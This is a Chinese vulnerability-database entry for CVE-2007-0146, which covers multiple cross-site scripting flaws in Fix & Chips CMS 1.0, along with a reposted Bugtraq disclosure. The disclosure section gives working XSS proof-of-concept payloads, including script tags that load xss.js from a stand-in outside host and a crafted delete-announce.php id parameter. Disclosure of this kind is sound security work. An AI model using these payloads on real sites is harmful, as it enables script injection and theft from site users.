Fix和Chips CMS多个跨站攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192194 漏洞类型 跨站脚本
发布时间 2007-01-09 更新时间 2007-01-09
CVE编号 CVE-2007-0146 CNNVD-ID CNNVD-200701-095
漏洞平台 N/A CVSS评分 6.0
|漏洞来源
https://www.securityfocus.com/bid/82031
https://cxsecurity.com/issue/WLB-2007010035
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-095
|漏洞详情
Fix和ChipsCMS1.0中存在多个跨站攻击漏洞。远程攻击者可以借助(a)delete-announce.php中的(1)id参数、(b)staff.php中的(2)通知格式字段、(c)new_customer.php中的(3)客户名、(4)公司名、(5)街道、(6)地址2、(7)乡镇/城市、(8)邮编、(9)电话号码、(10)电子邮件地址和(11)网站地址格式字段以及(d)search.php和(e)client-results.php中的未明字段,注入任意的web脚本或HTML。
|漏洞EXP
Fix & Chips CMS v1.0

http://software.fixnchipsit.com/

Vulnerable files:

staff.php
delete-announce.php
new-customer.php
search.php
client-results.php
--------------------------------------------

staff.php XSS
User input in the Announcement box isn't properly sanatized before being generated.

A few PoC's that work:

<SCRIPT SRC=http://somesite.com/xss.js></SCRIPT>

<IMG SRC=javascript:alert("XSS")>

----------------------------------------------

delete-announce.php XSS

http://www.example.com/delete-announce.php?id=<SCRIPT%20SRC=example.com/
xss.js></SCRIPT>

-------------------------------------------------
new-customer.php

User input in all of the input boxes when adding a new customer isnt sanatized. For a PoC in any input box when adding a new

client put:

<SCRIPT SRC=http://example.com/xss.js></SCRIPT>

Because of the above, all malicious user input that is listed on the pages search.php and client-results.php will execute as well.

------------------------------------------------

- Luny
|受影响的产品
Fix And Chips Computer Services Fix And Chips Cms 1.0
|参考资料

来源:BUGTRAQ
名称:20070106Fix&ChipsCMSv1.0
链接:http://www.securityfocus.com/archive/1/archive/1/456121/100/0/threaded
来源:VUPEN
名称:ADV-2007-0081
链接:http://www.frsirt.com/english/advisories/2007/0081
来源:SECUNIA
名称:23625
链接:http://secunia.com/advisories/23625
来源:XF
名称:fixandchips-multiple-scripts-xss(31319)
链接:http://xforce.iss.net/xforce/xfdb/31319
来源:OSVDB
名称:32650
链接:http://www.osvdb.org/32650
来源:OSVDB
名称:32649
链接:http://www.osvdb.org/32649
来源:OSVDB
名称:32648
链接:http://www.osvdb.org/32648
来源:OSVDB
名称:32647
链接:http://www.osvdb.org/32647
来源:OSVDB
名称:32646
链接:http://www.osvdb.org/32646
来源:SREASON
名称:2119
链接:http://securityreason.com/securityalert/2119